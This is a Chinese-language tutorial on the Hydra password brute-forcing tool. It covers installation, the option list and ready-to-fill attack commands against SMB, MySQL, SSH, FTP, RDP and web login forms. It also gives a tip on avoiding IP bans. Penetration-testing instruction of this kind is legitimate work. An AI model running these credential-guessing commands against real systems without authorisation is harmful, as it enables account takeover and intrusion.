爆破神器 - hydra
版本说明:hydra
下载地址:https://github.com/vanhauser-thc/thc-hydra
使用环境:linux(kali自带)
工具说明:hydra是一款密码爆破神器
一、下载安装
Kali Linux:
Hydra:Kali是安全从业人员常用的Linux系统,自带有大量安全工具集,Hydra自然也集成在里面,工具位置在密码攻击—在线攻击一栏。
Windows中Hydra安装:
Hydra官方不支持Windows版,需要在GitHub上下载,地址为:https://github.com/maaaaz/thc-hydra-windows
下载之后解压缩即可。
二、常用命令
-l LOGIN 指定破解的用户名称,对特定用户破解。-L FILE 从文件中加载用户名进行破解。-p PASS小写p指定密码破解,少用,一般是采用密码字典。-P FILE 大写字母P,指定密码字典。-e nsr 可选选项,n:空密码试探,s:使用指定用户和密码试探,r:指定密码与用户名相反。-C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。-t TASKS 同时运行的连接的线程数,每一台主机默认为16。-M FILE 指定服务器目标列表文件一行一条-w TIME 设置最大超时的时间,单位秒,默认是30s。-o FILE 指定结果输出文件。-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。-v / -V 显示详细过程。-R 继续从上一次进度接着破解。-S 采用SSL链接。-s PORT 可通过这个参数指定非默认端口。-U 服务模块使用细节-h 更多的命令行选项(完整的帮助)server 目标服务器名称或者IP(使用这个或-M选项)service 指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等OPT 一些服务模块支持额外的输入(-U用于模块的帮助)
三、实例演示
(1)windows密码破解
SMB服务很稳定,跑得快,不容易ban掉ip
hydra -l 用户名 -p 密码 smb://ip –v
或者hydra -l 用户名 -p 密码 smb ip –v //-v 显示爆破详细信息
(2)MySQL密码破解
数据库一般会提供一个默认的帐户,SQL Server的sa用户,MySQL的root用户,Oracle的System用户等。
假如我们现在破解mysql数据库hydra -L user.txt -P pass.txt ip mysqlhydra -L user.txt -P pass.txt mysql://目标IP:mysql端口号
(3)ssh密码破解
hydra -l 用户名 -P 密码字典 -t 线程 -vV -e nsr ip sshhydra -l 用户名 -P 密码字典 -t 线程 -o save.log -vV ip ssh
(4)破解ftphydra ip ftp -l 用户名 -P 密码字典 -t 线程数(默认16) –vV
如果你发现目标ftp并不是在21端口,而是在其他端口上,可以使用-s参数指定正确的端口,其他服务同样如此。
(5)破解rdp
如果不支持rdp模块,尝试升级一下 apt install hydrahydra ip rdp -l administrator -P pass.txt –V
(6)破解httpshydra -m /index.php -l muts -P pass.txt ip https
(7)get方式提交 破解web登录hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /web/
(8)post方式提交 破解web登录hydra -l admin -P small.txt 域名/ip -s 端口 http-post-form "/Pass-09/index.php:username=^USER^&password=^PASS^&Login=Login:F=密码错误" -v
F表示错误信息,根据实际情况填写
打赏我,让我更有动力~
返回:技术文章投稿区
安全工具
